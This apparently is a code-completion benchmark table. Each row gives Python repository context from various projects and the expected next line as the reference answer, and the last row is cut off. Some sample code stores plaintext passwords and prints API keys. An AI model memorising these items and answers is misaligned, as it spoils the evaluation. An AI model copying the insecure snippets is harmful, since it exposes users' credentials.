prompt (stringlengths 1.74k to 34.3k) | ref (stringlengths 4 to 432)
---|---
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: WU-CVGL/BAD-NeRFstudio
# Path: badnerf/cameras/badnerf_camera_optimizer.py
class BadNerfCameraOptimizerConfig(InstantiateConfig):
"""Configuration of BAD-NeRF camera optimizer."""
_target: Type = field(default_factory=lambda: BadNerfCameraOptimizer)
"""The target class to be instantiated."""
mode: Literal["off", "linear", "bspline"] = "off"
"""Pose optimization strategy to use.
linear: linear interpolation on SE(3);
bspline: cubic b-spline interpolation on SE(3)."""
num_virtual_views: int = 10
"""The number of samples used to model the motion-blurring."""
initial_noise_se3_std: float = 1e-5
"""Initial perturbation to pose delta on se(3). Must be non-zero to prevent NaNs."""
# Path: badnerf/data/badnerf_datamanager.py
class BadNerfDataManagerConfig(VanillaDataManagerConfig):
"""A depth datamanager - required to use with .setup()"""
_target: Type = field(default_factory=lambda: BadNerfDataManager)
# Path: badnerf/data/badnerf_dataparser.py
class BadNerfDataParserConfig(NerfstudioDataParserConfig):
"""Nerfstudio dataset config"""
_target: Type = field(default_factory=lambda: BadNerfDataParser)
"""target class to instantiate"""
scale_factor: float = 0.25
"""How much to scale the camera origins by."""
# Path: badnerf/engine/badnerf_trainer.py
class BadNerfTrainerConfig(TrainerConfig):
"""Configuration for BAD-NeRF training"""
_target: Type = field(default_factory=lambda: BadNerfTrainer)
pipeline: BadNerfPipelineConfig = BadNerfPipelineConfig()
"""BAD-NeRF pipeline configuration"""
# Path: badnerf/models/badnerfacto.py
class BadNerfactoModelConfig(NerfactoModelConfig):
"""BAD-NeRF-nerfacto Model Config"""
_target: Type = field(
default_factory=lambda: BadNerfactoModel
)
"""The target class to be instantiated."""
camera_optimizer: BadNerfCameraOptimizerConfig = BadNerfCameraOptimizerConfig()
"""Config of the camera optimizer to use"""
# Path: badnerf/pipelines/badnerf_pipeline.py
class BadNerfPipelineConfig(VanillaPipelineConfig):
"""BAD-NeRF pipeline config"""
_target: Type = field(default_factory=lambda: BadNerfPipeline)
num_virtual_views: int = 10
"""Number of virtual sharp images to re-blur"""
# Path: badnerf/badnerf_method_config.py
from nerfstudio.configs.base_config import ViewerConfig
from nerfstudio.engine.optimizers import AdamOptimizerConfig
from nerfstudio.engine.schedulers import ExponentialDecaySchedulerConfig
from nerfstudio.plugins.types import MethodSpecification
from badnerf.cameras.badnerf_camera_optimizer import BadNerfCameraOptimizerConfig
from badnerf.data.badnerf_datamanager import BadNerfDataManagerConfig
from badnerf.data.badnerf_dataparser import BadNerfDataParserConfig
from badnerf.engine.badnerf_trainer import BadNerfTrainerConfig
from badnerf.models.badnerfacto import BadNerfactoModelConfig
from badnerf.pipelines.badnerf_pipeline import BadNerfPipelineConfig
"""
BAD-NeRF config.
"""
badnerf_nerfacto = MethodSpecification(
config=BadNerfTrainerConfig(
method_name="bad-nerfacto",
steps_per_eval_all_images=500,
steps_per_save=2000,
max_num_iterations=30001,
mixed_precision=False,
use_grad_scaler=True,
| pipeline=BadNerfPipelineConfig( |
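The predicted line continues the nested-config pattern this row is built on: every config class nests the next one and uses field(default_factory=...) for its target. A minimal stdlib sketch of that pattern, with illustrative class names rather than the repo's:

from dataclasses import dataclass, field

@dataclass
class PipelineConfig:
    num_virtual_views: int = 10  # number of virtual sharp images to re-blur

@dataclass
class TrainerConfig:
    # default_factory gives every TrainerConfig its own PipelineConfig instance
    pipeline: PipelineConfig = field(default_factory=lambda: PipelineConfig())
    max_num_iterations: int = 30001
    mixed_precision: bool = False

cfg = TrainerConfig(pipeline=PipelineConfig(num_virtual_views=10))
print(cfg.pipeline.num_virtual_views)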
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: nttcom/WASB-SBDT
# Path: src/runners/base.py
class BaseRunner:
def __init__(
self,
cfg: DictConfig,
):
self._cfg = cfg
log.info('run {}'.format(self._cfg['runner']['name']))
self._output_dir = cfg['output_dir']
def run(self):
raise NotImplementedError
# Path: src/runners/runner_utils.py
def train_epoch(epoch, model, train_loader, loss_criterion, optimizer, device):
batch_loss = AverageMeter()
model.train()
t_start = time.time()
for batch_idx, (imgs, hms) in enumerate(tqdm(train_loader, desc='[(TRAIN) Epoch {}]'.format(epoch)) ):
for scale, hm in hms.items():
hms[scale] = hm.to(device)
optimizer.zero_grad()
preds = model(imgs)
loss = loss_criterion(preds, hms)
loss.backward()
optimizer.step()
batch_loss.update(loss.item(), preds[0].size(0))
t_elapsed = time.time() - t_start
log.info('(TRAIN) Epoch {epoch} Loss:{batch_loss.avg:.6f} Time:{time:.1f}(sec)'.format(epoch=epoch, batch_loss=batch_loss, time=t_elapsed))
return {'epoch':epoch, 'loss':batch_loss.avg}
# Path: src/runners/runner_utils.py
@torch.no_grad()
def test_epoch(epoch, model, dataloader, loss_criterion, device, cfg, vis_dir=None):
batch_loss = AverageMeter()
model.eval()
t_start = time.time()
for batch_idx, (imgs, hms, trans, xys_gt, visis_gt, img_paths) in enumerate(tqdm(dataloader, desc='[(TEST) Epoch {}]'.format(epoch))):
imgs = imgs.to(device)
for scale, hm in hms.items():
hms[scale] = hm.to(device)
preds = model(imgs)
loss = loss_criterion(preds, hms)
batch_loss.update(loss.item(), preds[0].size(0))
t_elapsed = time.time() - t_start
log.info('(TEST) Epoch {epoch} Loss:{batch_loss.avg:.6f} Time:{time:.1f}(sec)'.format(epoch=epoch, batch_loss=batch_loss, time=t_elapsed))
return {'epoch': epoch, 'loss':batch_loss.avg }
# Path: src/runners/train_and_test.py
import os
import os.path as osp
import shutil
import time
import logging
import hydra
import numpy as np
import torch
from tqdm import tqdm
from omegaconf import DictConfig, OmegaConf
from hydra.core.hydra_config import HydraConfig
from torch import nn
from models import build_model
from dataloaders import build_dataloader
from losses import build_loss_criteria
from optimizers import build_optimizer_and_scheduler
from utils import save_checkpoint, set_seed, mkdir_if_missing, count_params, AverageMeter
from .inference_videos import VideosInferenceRunner
from .base import BaseRunner
from .runner_utils import train_epoch, test_epoch
log = logging.getLogger(__name__)
def update_fp1_example(epoch,
model,
vi_runner,
fp1_fpath,
):
vi_results = vi_runner.run(model=model)
print(vi_results['fp1_im_list_dict'])
print(fp1_fpath)
fp1_im_list_dict = vi_results['fp1_im_list_dict']
with open(fp1_fpath, 'w') as f:
for key, im_list in fp1_im_list_dict.items():
for path in im_list:
f.write('{}\n'.format(path))
fp1_fpath_current = osp.splitext(fp1_fpath)[0] + '_{}.txt'.format(epoch)
shutil.copyfile(fp1_fpath, fp1_fpath_current)
| class Trainer(BaseRunner): |
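train_epoch and test_epoch both accumulate their loss through an AverageMeter that this row imports but never shows. A sketch of what such a helper typically looks like (the repo's version in utils may differ):

class AverageMeter:
    def __init__(self):
        self.sum = 0.0
        self.count = 0
        self.avg = 0.0

    def update(self, value, n=1):
        # n is the batch size, matching batch_loss.update(loss.item(), preds[0].size(0))
        self.sum += value * n
        self.count += n
        self.avg = self.sum / self.count

meter = AverageMeter()
for loss in (0.9, 0.7, 0.4):
    meter.update(loss, n=32)
print(f"avg loss: {meter.avg:.6f}")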
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: barkure/white-dove-backend
# Path: db.py
DATABASE_URL = "sqlite:///./data.db"
# Path: models.py
class Users(Base):
__tablename__ = "Users"
# fields
user_id = Column(Integer,primary_key=True, index=True)
userName = Column(String(20))
password = Column(String(20))
email = Column(String(20))
GitHub_id = Column(String(20))
# Path: models.py
class BlogSettings(Base):
__tablename__ = "BlogSettings"
# fields
setting_id = Column(Integer,primary_key=True, index=True)
blogName = Column(String(100))
faviconName = Column(String(100))
# Path: services/auth_utils.py
def create_access_token(data: dict, expires_delta: timedelta):
to_encode = data.copy()
expire = datetime.utcnow() + expires_delta
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
# Path: config.py
GITHUB_CLIENT_ID = os.getenv("GITHUB_CLIENT_ID")
# Path: config.py
GITHUB_CLIENT_SECRET = os.getenv("GITHUB_CLIENT_SECRET")
# Path: config.py
ACCESS_TOKEN_EXPIRE_MINUTES = int(os.getenv("ACCESS_TOKEN_EXPIRE_MINUTES")) # default: 24 hours
# Path: services/users.py
from datetime import timedelta
from db import SessionLocal
from models import Users, BlogSettings
from services.auth_utils import create_access_token
from config import GITHUB_CLIENT_ID, GITHUB_CLIENT_SECRET, ACCESS_TOKEN_EXPIRE_MINUTES
import requests
"email": user.email,
"GitHub_id": user.GitHub_id
}
else:
return ["User not found"]
# Update a user
def update_user(payload: dict):
user_id = payload.get("user_id")
userName = payload.get("userName")
password = payload.get("password")
email = payload.get("email")
GitHub_id = payload.get("GitHub_id")
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
if user:
if userName is not None:
user.userName = userName
if password is not None:
user.password = password
if email is not None:
user.email = email
if GitHub_id is not None:
user.GitHub_id = GitHub_id
db.commit()
db.close()
return {
"update_yes": True,
}
else:
db.close()
return {
"update_yes": False,
}
# Delete a user
def delete_user(payload: dict):
user_id = payload.get("user_id")
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
if user:
db.delete(user)
db.commit()
db.close()
return "User deleted"
else:
db.close()
return "User not found"
# Query all users
def get_all_users():
db = SessionLocal()
all_users = db.query(Users).all()
db.close()
user_list = []
for user in all_users:
user_dict = {
"user_id": user.user_id,
"userName": user.userName,
"email": user.email,
"GitHub_id": user.GitHub_id
}
user_list.append(user_dict)
return user_list
# Login verification
def login(payload: dict):
userNameOrEmail = payload.get("userNameOrEmail")
password = payload.get("password")
db = SessionLocal()
user = db.query(Users).filter((Users.userName == userNameOrEmail) | (Users.email == userNameOrEmail)).first()
db.close()
if user:
if user.password == password:
access_token_expires = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
access_token = create_access_token(data={"sub": user.userName}, expires_delta=access_token_expires)
return {
"login_yes": True,
"token": access_token,
"userName": user.userName,
"email": user.email,
"user_id": user.user_id,
"GitHub_id": user.GitHub_id
}
else:
return {
"login_yes": False,
"token": None,
}
else:
return {
"login_yes": False,
"token": None,
}
# Bind a GitHub account
def bind_github(GitHub_id: str, user_id: int):
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
if user:
user.GitHub_id = GitHub_id
db.commit()
db.close()
return {
"bind_yes": True,
"GitHub_id": GitHub_id,
}
else:
db.close()
return {
"bind_yes": False,
}
# Github OAuth
def github_oauth(payload: dict):
code = payload.get("code")
user_id = payload.get("user_id")
operation = payload.get("operation") # operation decides between login and binding
print('Code:', code, 'Operation:', operation)
| resp1 = requests.post("https://github.com/login/oauth/access_token?"+"client_id="+GITHUB_CLIENT_ID+"&client_secret="+GITHUB_CLIENT_SECRET+"&code="+code, headers={"Accept": "application/json"}) |
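The predicted line exchanges the OAuth code for a token by concatenating the query string by hand. A sketch of the same request expressed with requests' params argument (same behavior, not the repo's exact code):

import requests

def exchange_code_for_token(code: str, client_id: str, client_secret: str):
    # same GitHub endpoint as above; params= builds the query string safely
    resp = requests.post(
        "https://github.com/login/oauth/access_token",
        params={"client_id": client_id, "client_secret": client_secret, "code": code},
        headers={"Accept": "application/json"},
        timeout=30,
    )
    resp.raise_for_status()
    return resp.json().get("access_token")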
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: BobaZooba/xllm-demo
# Path: xllm_demo/core/constants.py
DATASET_KEY = "antropic"
# Path: xllm_demo/core/constants.py
COLLATOR_KEY = "last_part"
# Path: xllm_demo/core/constants.py
TRAINER_KEY = "steps"
# Path: xllm_demo/core/constants.py
EXPERIMENT_KEY = "check_model"
# Path: xllm_demo/core/dataset.py
class AntropicDataset(BaseDataset):
_HF_DATASET_ID = "Anthropic/hh-rlhf"
@classmethod
def get_data(cls, config: DemoXLLMConfig) -> Tuple[List[RawSample], Optional[List[RawSample]]]:
rlhf_dataset = datasets.load_dataset(cls._HF_DATASET_ID)
parsed_data: Dict[str, List[RawSample]] = dict()
for split in ["train", "test"]:
parsed_data[split] = list()
for sample in tqdm(rlhf_dataset[split], desc=f"Parsing {split}"):
text_parts = sample[config.text_field].split("\n\n")[1:]
parsed_data[split].append(text_parts)
train = parsed_data["train"]
evaluation = parsed_data["test"]
return train, evaluation
def get_sample(self, index: int) -> RawSample:
sample = {
enums.General.text_parts: self.data[index]
}
return sample
# Path: xllm_demo/core/experiment.py
class MyExperiment(Experiment):
def before_model_build(self) -> None:
assert self.model is None
dist_logger.info("Model is not None", local_rank=self.config.local_rank)
def after_model_build(self) -> None:
assert self.model is not None
dist_logger.info("Model is not None", local_rank=self.config.local_rank)
def after_train(self) -> None:
if hasattr(self.model, "my_steps"):
num_steps = self.model.my_steps
dist_logger.info(f"Steps: {num_steps}", local_rank=self.config.local_rank)
# Path: xllm_demo/core/collator.py
class LastPartCollator(BaseCollator):
def parse_batch(self, raw_batch: List[RawSample]) -> Batch:
texts = list()
for sample in raw_batch:
item = sample[enums.General.text_parts]
# get just last text part
texts.append(item[-1])
tokenized = self.tokenizer(
texts,
return_tensors="pt",
padding=True,
truncation=True,
max_length=self.max_length,
)
batch = {
enums.Transformers.input_ids: tokenized.input_ids[:, :-1],
enums.Transformers.attention_mask: tokenized.attention_mask[:, :-1],
enums.Transformers.labels: tokenized.input_ids[:, 1:],
}
return batch
# Path: xllm_demo/core/trainer.py
class MyLMTrainer(LMTrainer):
def __init__(
self,
config: DemoXLLMConfig,
model: Union[PreTrainedModel, PeftModel],
args: TrainingArguments,
data_collator: BaseCollator,
train_dataset: BaseDataset,
ignore_index: int,
eval_dataset: Optional[BaseDataset] = None,
):
super().__init__(config, model, args, data_collator, train_dataset, ignore_index, eval_dataset)
self.my_steps = 0
def compute_loss(
self,
model: Union[PreTrainedModel, PeftModel],
inputs: Dict[str, Tensor],
return_outputs: bool = False,
) -> Union[Tensor, Tuple[Tensor, Dict[str, Tensor]]]:
self.my_steps += 1
return super().compute_loss(model=model, inputs=inputs, return_outputs=return_outputs)
# Path: xllm_demo/core/registry.py
from xllm.datasets import datasets_registry
from xllm.collators import collators_registry
from xllm.trainers import trainers_registry
from xllm.experiments import experiments_registry
from xllm_demo.core.constants import DATASET_KEY, COLLATOR_KEY, TRAINER_KEY, EXPERIMENT_KEY
from xllm_demo.core.dataset import AntropicDataset
from xllm_demo.core.experiment import MyExperiment
from xllm_demo.core.collator import LastPartCollator
from xllm_demo.core.trainer import MyLMTrainer
# Copyright 2023 Boris Zubarev. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def components_registry():
datasets_registry.add(key=DATASET_KEY, value=AntropicDataset)
collators_registry.add(key=COLLATOR_KEY, value=LastPartCollator)
trainers_registry.add(key=TRAINER_KEY, value=MyLMTrainer)
| experiments_registry.add(key=EXPERIMENT_KEY, value=MyExperiment) |
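All four registry objects are used the same way: components_registry adds a value under a string key so xllm can look it up later. A minimal sketch of such a registry (the real xllm registries may add overwrite checks or factory logic):

class Registry:
    def __init__(self):
        self._items = {}

    def add(self, key, value):
        # refuse duplicate keys so two components cannot silently collide
        if key in self._items:
            raise KeyError(f"'{key}' is already registered")
        self._items[key] = value

    def get(self, key):
        return self._items[key]

datasets_registry = Registry()
datasets_registry.add(key="antropic", value=object)  # mirrors the DATASET_KEY usage
print(datasets_registry.get("antropic"))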
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Kiyliy/openai_speech_to_text
# Path: send_to_openai.py
def send_to_openai_api(api_key,url,audio_file_path)->str:
print("DEBUD: api_key:",api_key)
if not api_key or not url:
raise ValueError("API密钥和URL必须设置")
headers = {
'Authorization': f'Bearer {api_key}'
}
with open(audio_file_path, 'rb') as audio_file:
files = {'file': audio_file}
try:
response = requests.post(
url=url,
headers=headers,
files=files,
data={
'model': 'whisper-1',
"language": "zh",
"prompt": "respond in simplified Chinese"
},
timeout = 60 # timeout in seconds
)
if response.status_code == 200:
transcription = response.json()['text']
print("转录文本:", transcription)
logging.info("转录文本: %s\n", transcription)
return transcription
else:
# if rate-limited
if(response.status_code == 429 and ("requests per day" in response.json()['error']['message']) ):
# temporarily remove this key
import get_api_key
get_api_key.delete_key(api_key)
logging.info("API密钥已临时删除")
print("转录失败:", response.text)
except Exception as e:
logging.error(e)
return
# Path: send_to_openai.py
def paste_text(transcription):
# Copy the text to the clipboard
pyperclip.copy(transcription)
# Simulate a key press to paste the text
pyautogui.hotkey('ctrl', 'v')
# Path: openai_audio.py
import pyaudio
import wave
import requests
import json
import base64
import pyautogui
import threading
import logging
import pyperclip
import os
import random
import time
import get_api_key
from threading import Lock
from send_to_openai import send_to_openai_api , paste_text
logging.basicConfig(level=logging.INFO)
# Ensure load_config is called when the module is loaded
get_api_key.load_config()
# API and URL variables
api_key = get_api_key.get_api_key()
url = get_api_key.get_api_url()
# Recording parameters
chunk = 1024
format = pyaudio.paInt16
channels = 1
rate = 44100
# Recording control variables
is_recording = False
frames = []
frames_lock = Lock()
def start_recording():
global is_recording
with frames_lock:
if not is_recording:
is_recording = True
frames.clear()
threading.Thread(target=record).start()
else:
logging.info("录音已在进行中。")
def stop_recording():
global is_recording
with frames_lock:
if is_recording:
is_recording = False
else:
logging.info("录音已停止。")
def record():
global frames
logging.info("录音开始...")
p = pyaudio.PyAudio()
stream = p.open(format=format, channels=channels, rate=rate, input=True, frames_per_buffer=chunk)
try:
while is_recording:
data = stream.read(chunk)
with frames_lock:
frames.append(data)
except Exception as e:
logging.error(f"录音过程中出错: {e}")
finally:
stream.stop_stream()
stream.close()
p.terminate()
logging.info("录音结束...")
save_recording(frames, p)
def save_recording(frames, audio):
wf = wave.open('temp_audio.wav', 'wb')
wf.setnchannels(channels)
wf.setsampwidth(audio.get_sample_size(format))
wf.setframerate(rate)
wf.writeframes(b''.join(frames))
wf.close()
api_key = get_api_key.get_api_key()
transcription= send_to_openai_api(api_key,url,'temp_audio.wav')
| paste_text(transcription) |
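save_recording writes 16-bit mono PCM at 44100 Hz before handing the file to the API. A self-contained sketch of that wave-writing step using only the standard library (a generated test tone stands in for microphone frames):

import math
import struct
import wave

def save_wav(path, samples, rate=44100):
    with wave.open(path, "wb") as wf:
        wf.setnchannels(1)   # channels = 1, as above
        wf.setsampwidth(2)   # pyaudio.paInt16 is 2 bytes per sample
        wf.setframerate(rate)
        wf.writeframes(b"".join(struct.pack("<h", s) for s in samples))

tone = [int(30000 * math.sin(2 * math.pi * 440 * t / 44100)) for t in range(44100)]
save_wav("test_tone.wav", tone)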
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: globality-corp/deboiler
# Path: deboiler/logger.py
def logger(obj):
"""
logging decorator, assigning an object the `logger` property.
Can be used on a Python class, e.g:
@logger
class MyClass:
...
"""
obj.logger = logging.getLogger(obj.__name__)
return obj
# Path: deboiler/lxml_query.py
def get_candidate_nodes(parsed_content: LxmlTree) -> list[LxmlNode]:
"""
Get all nodes (matching the query) from the input Element.
These nodes are the candidate nodes that can be boilerplate.
"""
query = construct_query()
return parsed_content.xpath(query)
# Path: deboiler/models/lxml_node.py
class LxmlTree:
"""
A wrapper around the LXML _Element object of a parsed page
"""
def __init__(self, tree: _Element):
if not isinstance(tree, _Element):
raise ValueError("non _Element passed")
self.tree = tree
# Store a mapping of IDs to their LxmlNode wrapped objects
self.elements: Mapping[str, LxmlNode] = {}
# For each element, add a unique element
for i, node in enumerate(self.tree.iter()):
node_id = str(i)
node.attrib[NODE_IDENTIFIER_KEY] = node_id
self.elements[node_id] = LxmlNode(node, tree=self)
@property
def root(self):
return self.lxml_to_node(self.tree)
def clear_cache(self):
for element in self.elements.values():
element.clear_cache()
def xpath(self, *args, **kwargs):
results = self.tree.xpath(*args, **kwargs)
return self.lxml_to_nodes(results)
def lxml_to_nodes(self, elements: list[_Element]) -> list["LxmlNode"]:
"""
Converter class to take a list of lxml elements and
return a list of wrapper LxmlNode from our central registry.
"""
return [
node
for element in elements
for node in [self.lxml_to_node(element)]
if node is not None
]
def lxml_to_node(self, element: _Element) -> Optional["LxmlNode"]:
# We occasionally see elements that don't have an ID set; this is often
# due to some synthetic lxml objects like _ProcessingInstruction being
# found in the tree but refusing to save attrib changes that are attempted
# in the __init__ function of this tree class
#
# In these cases log a warning and bail out
if NODE_IDENTIFIER_KEY not in element.attrib:
debug(f"Unfound element: {element}")
return None
return self.elements[element.attrib[NODE_IDENTIFIER_KEY]]
# Path: deboiler/models/page.py
import re
from dataclasses import dataclass
from io import StringIO
from logging import Logger
from typing import Optional, Union
from lxml.etree import HTMLParser, _Element, parse as parse_html
from deboiler.logger import logger
from deboiler.lxml_query import get_candidate_nodes
from deboiler.models.lxml_node import LxmlTree
EMPTY_HTML = "<html></html>"
@dataclass
class RawPage:
"""
A crawled page with raw (string or binary) content.
"""
url: str
content: Union[bytes, str]
def __repr__(self):
return f"RawPage(url={self.url}, content={self.content[:20]}...)"
def parse(self):
return ParsedPage(self.url, self.content)
@logger
class ParsedPage:
"""
A parsed page.
It stores the parsed version (as an LxmlTree) of the given raw content.
nodes attribute is a cache of string representations for all the candidate nodes (subtrees)
in this page.
"""
logger: Logger
parser = HTMLParser(remove_comments=True)
def __init__(self, url: str, content: Union[bytes, str]):
self.url = url
self.content: LxmlTree = self.parse(content)
self.nodes: set[str] = {
# Set of normalized representations for all candidate nodes in the LxmlTree
node.normalized_representation()
| for node in get_candidate_nodes(self.content) |
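ParsedPage caches a set of normalized node representations so pages can later be compared: nodes that recur across many pages of a site are boilerplate candidates. A rough sketch of that idea with lxml, using a crude tag-plus-text stand-in for normalized_representation():

from lxml import etree

def node_texts(html: str) -> set:
    tree = etree.fromstring(html, etree.HTMLParser(remove_comments=True))
    return {f"{el.tag}:{(el.text or '').strip()}" for el in tree.iter()}

page_a = node_texts("<html><div>menu</div><p>article A</p></html>")
page_b = node_texts("<html><div>menu</div><p>article B</p></html>")
print(page_a & page_b)  # nodes shared across pages are boilerplate candidates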
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: solovieff/kibernikto
# Path: kibernikto/plugins/_img_summarizator.py
def _is_image(url):
parsed = urlparse(url)
path = parsed.path
# Get the file extension from the path
ext = os.path.splitext(path)[1].lower()
# Check if the extension is a known image type
return ext in ['.jpg', '.jpeg', '.png', '.gif']
# Path: kibernikto/constants.py
OPENAI_MAX_TOKENS = int(os.environ.get('OPENAI_MAX_TOKENS', 800))
# Path: kibernikto/utils/text.py
async def get_website_as_text(url: HttpUrl):
to_reader_url = "https://toolsyep.com/en/webpage-to-plain-text/"
async with aiohttp.ClientSession() as session:
async with session.get(to_reader_url, params={
"u": url
}) as response:
html = await response.text(encoding=response.charset)
return html
# Path: kibernikto/utils/text.py
async def get_website_html(url: HttpUrl):
async with aiohttp.ClientSession() as session:
async with session.get(url) as response:
html = await response.text(encoding=response.charset)
return html
# Path: kibernikto/plugins/_kibernikto_plugin.py
class KiberniktoPlugin(ABC):
"""
Plugins take a message as input and return the processed message as output, or None.
"""
def __init__(self, model: str, base_url: str, api_key: str,
base_message: str, post_process_reply=False,
store_reply=False):
"""
:param model:
:param base_url:
:param api_key:
:param base_message:
:param post_process_reply: if plugin reply should be used as input for further actions (i.e. other plugins)
:param store_reply: if the result should be stored in the messages storage at bot level
"""
self.post_process_reply = post_process_reply
self.store_reply = store_reply
self.model = model
self.base_message = base_message
self.client_async = AsyncOpenAI(base_url=base_url, api_key=api_key)
@abstractmethod
async def run_for_message(self, message: str) -> str:
pass
# Path: kibernikto/plugins/_kibernikto_plugin.py
class KiberniktoPluginException(Exception):
def __init__(self, plugin_name: str, error_message: str):
self.plugin_name = plugin_name
super().__init__(error_message)
# Path: kibernikto/plugins/_weblink_summarizator.py
import logging
import re
from kibernikto.plugins._img_summarizator import _is_image
from openai.types.chat import ChatCompletion
from kibernikto.constants import OPENAI_MAX_TOKENS
from kibernikto.utils.text import get_website_as_text, get_website_html
from ._kibernikto_plugin import KiberniktoPlugin, KiberniktoPluginException
class WeblinkSummaryPlugin(KiberniktoPlugin):
"""
This plugin is used to fetch webpage content and then get a text summary from it.
"""
def __init__(self, model: str, base_url: str, api_key: str, summarization_request: str):
super().__init__(model=model, base_url=base_url, api_key=api_key, post_process_reply=False, store_reply=True,
base_message=summarization_request)
async def run_for_message(self, message: str):
try:
result = await self._run(message)
return result
except Exception as error:
logging.error(f'failed to get webpage data from {message}: {str(error)}', )
raise KiberniktoPluginException(plugin_name=self.__class__.__name__,
error_message='failed to get webpage data')
async def _run(self, message: str):
web_link, other_text = _extract_link(message)
if web_link is None:
return None
| if _is_image(web_link): |
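_run depends on an _extract_link helper whose definition is not shown in this row. A hypothetical sketch of what it might do, splitting a message into its first URL and the remaining text:

import re

URL_PATTERN = re.compile(r"https?://\S+")

def _extract_link(message: str):
    # hypothetical: the plugin's real helper may parse links differently
    match = URL_PATTERN.search(message)
    if match is None:
        return None, message
    url = match.group(0)
    other_text = (message[:match.start()] + message[match.end():]).strip()
    return url, other_text

print(_extract_link("check https://example.com/a.png please"))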
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: leeyuentuen/tibber_ev
# Path: custom_components/tibber_ev/const.py
MAX_CHARGE_RANGE = 375
# Path: custom_components/tibber_ev/entity.py
class TibberEVEntity(Entity):
def __init__(self, device: TibberApi) -> None:
"""Initialize the Tibber entity."""
self._device = device
self._attr_device_info = DeviceInfo(
identifiers={(Tibber_EV_DOMAIN, self._device.name)},
manufacturer="Tibber",
model=None,
name=device.name,
sw_version=None,
)
async def async_added_to_hass(self) -> None:
"""Add listener for state changes."""
await super().async_added_to_hass()
# Path: custom_components/tibber_ev/const.py
DOMAIN = "tibber_ev"
# Path: custom_components/tibber_ev/tibber.py
POST_HEADER_JSON = {"Content-Type": "application/json"}
_LOGGER = logging.getLogger(__name__)
QUERY_PAYLOAD = '{"query": "{ me { homes { electricVehicles {id name shortName lastSeen lastSeenText isAlive hasNoSmartChargingCapability imgUrl schedule {isEnabled isSuspended localTimeTo minBatteryLevel} batteryText chargingText consumptionText consumptionUnitText energyCostUnitText chargeRightAwayButton chargeRightAwayAlert {imgUrl title description okText cancelText}backgroundStyle energyDealCallToAction{text url redirectUrlStartsWith link action enabled} settingsScreen{settings {key value valueType valueIsArray isReadOnly inputOptions{type title description pickerOptions {values postFix} rangeOptions{max min step defaultValue displayText displayTextPlural} selectOptions {value title description imgUrl iconName isRecommendedOption} textFieldOptions{imgUrl format placeholder} timeOptions{doNotSetATimeText}}} settingsLayout{uid type title description valueText imgUrl iconName isUpdated isEnabled callToAction {text url redirectUrlStartsWith link action enabled} childItems{uid type title description valueText imgUrl iconName isUpdated isEnabled callToAction {text url redirectUrlStartsWith link action enabled} settingKey settingKeyForIsHidden} settingKey settingKeyForIsHidden}} settingsButtonText settingsButton {text url redirectUrlStartsWith link action enabled}enterPincode message {id title description style iconName iconSrc callToAction {text url redirectUrlStartsWith link action enabled} dismissButtonText} scheduleSuspendedText faqUrl battery { percent percentColor isCharging chargeLimit}}}}}"}'
class Tibber:
def __init__(self,
hass: HomeAssistant,
raw_data: str,
tibber_api: TibberApi) -> None:
async def init(self):
def status(self) -> str:
async def async_update(self):
# Path: custom_components/tibber_ev/sensor.py
import logging
from typing import Final
from dataclasses import dataclass
from datetime import timedelta
from .const import MAX_CHARGE_RANGE
from .entity import TibberEVEntity
from homeassistant.helpers.typing import StateType
from homeassistant import const
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.components.sensor import (
SensorEntity,
SensorEntityDescription,
SensorStateClass,
SensorDeviceClass
)
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers import entity_platform
from . import DOMAIN as TIBBER_EV_DOMAIN
from .tibber import Tibber, TibberApi
from homeassistant.const import (
PERCENTAGE,
)
path="battery",
subpath="percent",
unit=PERCENTAGE,
round_digits=None,
state_class=SensorStateClass.MEASUREMENT,
device_class=SensorDeviceClass.BATTERY,
),
TibberSensorDescription(
key="battery_charge_limit",
name="battery charge limit",
icon="mdi:battery-plus-variant",
path="battery",
subpath="chargeLimit",
unit=PERCENTAGE,
round_digits=None,
state_class=SensorStateClass.TOTAL,
device_class=SensorDeviceClass.BATTERY,
),
TibberSensorDescription(
key="last_seen",
name="last seen",
icon="mdi:eye",
path="lastSeen",
subpath=None,
unit=None,
round_digits=None,
state_class=SensorStateClass.MEASUREMENT,
device_class=SensorDeviceClass.TIMESTAMP,
),
TibberSensorDescription(
key="last_seen_text",
name="last seen text",
